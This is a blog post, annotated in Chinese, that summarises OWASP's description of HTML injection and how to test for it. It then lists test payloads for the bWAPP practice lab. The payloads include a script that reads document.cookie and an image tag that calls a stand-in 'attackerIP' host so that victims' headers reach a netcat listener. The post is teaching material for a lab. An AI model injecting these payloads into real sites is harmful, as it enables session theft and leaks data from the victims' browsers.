OWASP 之 HTML Injection

Summary

  HTML injection is a type of injection issue that occurs when a user is able to control an input point and is able to inject arbitrary(任意) HTML code into a vulnerable web page. This vulnerability can have many consequences(后果), like disclosure of a user‘s session cookies that could be used to impersonate(模仿) the victim, or, more generally, it can allow the attacker to modify the page content seen by the victims.

  This vulnerability occurs when the user input is not correctly sanitized(消毒) and the output is not encoded. An injection allows the attacker to send a malicious(恶毒) HTML page to a victim. The targeted browser will not be able to distinguish (trust) the legit(合法) from the malicious parts and consequently will parse and execute all as legit in the victim context.

How to Test

  There is a wide range of methods and attributes that could be used to render HTML content. If these methods are provided with an untrusted input, then there is an high risk of XSS, specifically an HTML injection one. Malicious HTML code could be injected for example via(通过) innerHTML, that is used to render user inserted HTML code. If strings are not correctly sanitized the problem could lead to XSS based HTML injection. Another method could be document.write().

Test in BWAPP

  

输入html代码:<h1><b><u>Click Me ! Boy<u></b><h1>  

输入脚本:<script>alert(document.cookie)</script>

nc弹个headers:<img src="http://attackerIP/blah">

恶补NC去了,更多利用稍后更新。。。。

时间: 2024-11-09 05:06:23

OWASP 之 HTML Injection的相关文章

【译】Attacking XML with XML External Entity Injection (XXE)

原文链接:Attacking XML with XML External Entity Injection (XXE) XXE:使用XML外部实体注入攻击XML 在XML中,有一种注入外部文件的方式.长久以来,自动XML解析器(在后端使用libxml2)默认启用.因此,使用XML来格式化和传递数据的站点是存在漏洞的. XML经常被这样使用,一些常规的猜想是一些API发起SOAP请求和Javascript / Ajax使用XML传递数据. 建立你的测试平台 对于基于web的攻击,我喜欢在Mutil

OWASP(Open Web Application Security Project) Top 10 for JavaScript

Injection Injection flaws, such as SQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker's hostile data can trick the interpreter into executing unintended commands or accessing u

SQL injection

SQL injection is a code injection technique, used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker).[1] SQL injection must exploit

XXE (XML External Entity Injection) :XML外部实体注入

XXE (XML External Entity Injection) 0x01 什么是XXE XML外部实体注入 若是PHP,libxml_disable_entity_loader设置为TRUE可禁用外部实体注入 0x02 XXE利用 *简单文件读取 XMLInject.php <?php # Enable the ability to load external entities libxml_disable_entity_loader (false); $xmlfile = file_g

OWASP top10

PhishTank 是互联网上免费提供恶意网址黑名单的组织之一,它的黑名单由世界各地的志愿者提供,且更新频繁. 1.XSS 1.1. XSS简介 跨站脚本攻击,英文全称是Cross Site Script,本来缩写是CSS,但是为了和层叠样式表有所区分,所以在安全领域叫做"XSS". XSS攻击,通常指黑客通过"HTML注入"篡改了网页,插入了恶意的脚本,从而在用户浏览网页时,控制用户浏览器的一种攻击. 1.2. XSS分类 XSS根据效果的不同可以分成如下几类 第

理解依赖注入(Dependency Injection)

理解依赖注入 Yii2.0 使用了依赖注入的思想.正是使用这种模式,使得Yii2异常灵活和强大.千万不要以为这是很玄乎的东西,看完下面的两个例子就懂了. class SessionStorage { function __construct($cookieName = 'PHP_SESS_ID') { session_name($cookieName); session_start(); } function set($key, $value) { $_SESSION[$key] = $valu

【五】注入框架RoboGuice使用:(Your First POJO Injection)

上一篇我们简单的介绍了一下RoboGuice的使用([四]注入框架RoboGuice使用:(Your First System Service Injection)),今天我们来看下普通Java对象的使用注解的方法: (一)为了在Activity中普通Java对象使用注解,必须实现以下两个步骤: ①:创建继承RoboActivity的Activity ②:使用 @Inject来进行注解POJO(普通java对象) 在前面我们介绍了View控件,资源文件(Resources),系统服务(Syste

VMC INJECTION(开源JAVA模板框架)

VMC Injection是一个开源Java模板框架,它是由vmcreative公司开发,并在最近刚刚发布的.VMC Injection支持任何Java数据结构,(例如:JDBBC,POJO,HashMap等),并且VMC Injection可以很容易的将这些Java数据结构注入到文本模板中(HTML/XML等模板) VMC Injection(Java模板框架)被用于vmcreateive公司的很多商业项目中,如在web应用程序中,借助Servlet和VMC Injection生成动态的网页,

小白日记46:kali渗透测试之Web渗透-SqlMap自动注入(四)-sqlmap参数详解- Enumeration,Brute force,UDF injection,File system,OS,Windows Registry,General,Miscellaneous

sqlmap自动注入 Enumeration[数据枚举] --privileges -U username[CU 当前账号] -D dvwa -T users -C user --columns  [指定数据库,表,列] --exclude-sysdbs [排除系统层的库] ******************************************************************************* #查具体数据 [前提:当前数据库用户有权读取informatio